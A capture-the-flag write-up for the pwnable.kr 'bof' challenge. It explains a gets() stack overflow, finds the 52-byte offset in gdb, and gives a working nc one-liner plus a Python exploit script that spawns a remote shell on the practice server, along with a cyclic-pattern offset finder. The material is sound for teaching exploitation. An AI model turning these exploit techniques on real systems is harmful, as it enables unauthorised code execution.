# 03 - bof

## The Challenge

Nana told me that buffer overflow is one of the most common software vulnerabilities. Is that true?

Running at: nc pwnable.kr 9000

## The Solution

This is a basic buffer overflow challenge.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFtSB4jczm510FtT83Z%2F-MFu2i2emcRauVlKbkXa%2Fimage.png?alt=media\&token=2f5fdbaf-ed6d-4e53-a813-a4e306b4d048)

**func** receives an argument (**key**) and reads our input into its 32-byte local buffer **overflowme** with the unsafe **gets**, which has no length limit and so writes past the end of the buffer into the rest of the stack frame. Our input therefore reaches the argument slot, and overwriting it with the value **func** compares against, 0xcafebabe, makes it call system("/bin/sh"). Afterwards we need to keep the connection to the server open so we can talk to the newly spawned shell and read the flag.

### Finding the offset

We're using **gdb**. Set a breakpoint at the beginning of **func**, run, and disassemble the next 15 instructions from there to find the call to **gets**.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFuIs6VCwEsQCWKXHXZ%2F-MFuPw66Nx3vRSLO5Z2K%2Fimage.png?alt=media\&token=f1c0795a-63b1-4adf-9cec-4f26accdf504)

Here it is, at 0x5655564f (the binary is position independent, so this address will differ between machines and between runs with ASLR enabled). Set a breakpoint at the instruction right after the call, so that we stop once **gets** has filled the buffer, and continue execution.

Enter easily recognisable input, 32 bytes of the same character, like so

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFuIs6VCwEsQCWKXHXZ%2F-MFuU7DcZvtN6GD9VTCa%2Fimage.png?alt=media\&token=437e9ae9-e261-407d-a07c-a870b772a953)

Now examine 32 word-sized chunks of memory starting at ESP (`x/32wx $esp`).

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFuIs6VCwEsQCWKXHXZ%2F-MFuQsMfxC58dcAYPI3K%2Fimage.png?alt=media\&token=8c8b3dde-984a-4e75-9a14-0a9a053ef339)

Here is our 32-byte input, and 52 bytes after its start lies 0xdeadbeef, the value **main** passed as the argument. So **52** is our offset: the 32-byte buffer plus the 20 bytes of frame between it and the argument slot (stack canary, padding, saved EBP and return address). Note that the payload clobbers the canary and the return address too, but the canary check only runs in **func**'s epilogue, after system("/bin/sh") has already given us a shell; the process will abort with a stack-smashing message only once we exit that shell.
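The write-up finds the offset by eye, counting from the recognisable input in the gdb dump to 0xdeadbeef. The added example below (my own code, not part of the original write-up) generalises that step: it sends a cyclic de Bruijn pattern, in which every 4-byte window is unique, reads back the 4 bytes that landed in the argument slot, and maps them to an offset, the same idea as pwntools' `cyclic`/`cyclic_find`. The frame model in `simulate_gets_overflow` is a constructed toy (buffer at offset 0, the argument 52 bytes above it, holding 0xdeadbeef), assumed for illustration, not the real binary.

```python
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes = ALPHABET, n: int = 4):
    """Lazily yield the de Bruijn sequence B(k, n): every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern, e.g. b'aaaabaaacaaad...'."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(needle: bytes, n: int = 4) -> int:
    """Offset of the first window equal to `needle` (the bytes that landed in a slot or register), or -1."""
    if len(needle) != n:
        raise ValueError(f"needle must be {n} bytes")
    window = bytearray()
    for pos, byte in enumerate(de_bruijn(ALPHABET, n)):
        window.append(byte)
        if len(window) > n:
            del window[0]
        if len(window) == n and bytes(window) == needle:
            return pos - n + 1
    return -1


def simulate_gets_overflow(payload: bytes, key_offset: int = 52, key: int = 0xDEADBEEF) -> bytes:
    """Constructed toy model of func()'s frame: overflowme at offset 0, the argument `key`
    at key_offset. gets() copies the payload with no bound, so bytes past the 32-byte
    buffer land on the canary, saved EBP, return address and finally the argument."""
    frame = bytearray(key_offset + 4)
    frame[key_offset:key_offset + 4] = struct.pack("<I", key)
    if len(payload) > len(frame):
        raise ValueError("payload longer than the modelled frame")
    frame[:len(payload)] = payload
    return bytes(frame[key_offset:key_offset + 4])


def find_key_offset(pattern_length: int = 56) -> int:
    """Send a cyclic pattern, read what the argument slot now holds, map it back to an offset."""
    landed = simulate_gets_overflow(cyclic(pattern_length))
    return cyclic_find(landed)


if __name__ == "__main__":
    print(find_key_offset())  # 52 for the modelled frame
```

Against the real target you would paste `cyclic(56)` as the input in gdb, read the four bytes now sitting where 0xdeadbeef was (`x/wx` on the argument slot), and feed them to `cyclic_find`; a short `b"A" * 32` input leaves the slot untouched, which is a quick check that the buffer really is 32 bytes.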

### Python3 one-liner

There is a catch with Python 3: print() takes a str, and a str is a sequence of Unicode code points rather than bytes, so every code point above 0x7f is encoded on the way out (as UTF-8 under the usual locale) and '\xbe' leaves as the two bytes c2 be, mangling our address \[[link](https://stackoverflow.com/questions/32017389/write-different-hex-values-in-python2-and-python3)]. The raw bytes have to go through the binary stream, sys.stdout.buffer.write, instead of print(). To gain a semi-interactive shell we sent over the **cat** command without arguments. From the 'cat' man page:

> With no FILE, or when FILE is -, read standard input.

Try running cat without arguments on your machine: it echoes back every line you type. In the pipeline below, cat keeps the pipe, and with it the nc connection, open after the Python payload has been sent and forwards whatever we type to the newly opened shell on pwnable.kr's machine, which gives us command execution with some interactivity.

```
(python3 -c "import sys; sys.stdout.buffer.write(b'A' * 52 + b'\xbe\xba\xfe\xca\n')" && cat) | nc pwnable.kr 9000
```
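As an added example (my own code, not from the original write-up), the same exploit as a small script: `build_payload` packs the key little-endian with `struct`, `text_encoding_trap` shows exactly what print() would have sent instead, and `interact` replaces `cat` by relaying stdin to the socket and socket output to stdout. The offset 52 and the comparison value 0xcafebabe come from the write-up; the UTF-8 locale assumed in `text_encoding_trap` is an assumption.

```python
import select
import socket
import struct
import sys

# From the write-up: the argument sits 52 bytes above overflowme, and func()
# spawns system("/bin/sh") when that argument equals 0xcafebabe.
OFFSET = 52
KEY_WANTED = 0xCAFEBABE
TARGET = ("pwnable.kr", 9000)


def build_payload(offset: int = OFFSET, key: int = KEY_WANTED) -> bytes:
    """Filler up to the argument slot, the key little-endian, then the newline gets() stops at."""
    return b"A" * offset + struct.pack("<I", key) + b"\n"


def text_encoding_trap(key: int = KEY_WANTED) -> bytes:
    """What print() would emit for the same four bytes: the code points U+00BE U+00BA
    U+00FE U+00CA, UTF-8 encoded (assumed locale), are eight bytes instead of four."""
    as_text = "".join(chr(b) for b in struct.pack("<I", key))
    return as_text.encode("utf-8")


def interact(sock: socket.socket) -> None:
    """Relay our stdin to the remote shell and its output to our terminal (what `cat` did)."""
    while True:
        readable, _, _ = select.select([sock, sys.stdin], [], [])
        if sock in readable:
            data = sock.recv(4096)
            if not data:          # shell exited or connection closed
                return
            sys.stdout.buffer.write(data)
            sys.stdout.buffer.flush()
        if sys.stdin in readable:
            line = sys.stdin.buffer.readline()
            if not line:          # EOF on our side
                return
            sock.sendall(line)


def exploit(target=TARGET) -> None:
    payload = build_payload()
    # gets() stops at the first newline, so the address bytes must not contain one.
    if b"\n" in payload[:-1]:
        raise ValueError("payload contains a newline before the terminator")
    with socket.create_connection(target) as sock:
        sock.sendall(payload)
        interact(sock)


if __name__ == "__main__":
    exploit()
```

Run it, then type `cat flag` at the prompt; the script exits when the remote shell closes the connection (after `exit`, the target process aborts on the smashed canary, which is expected).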
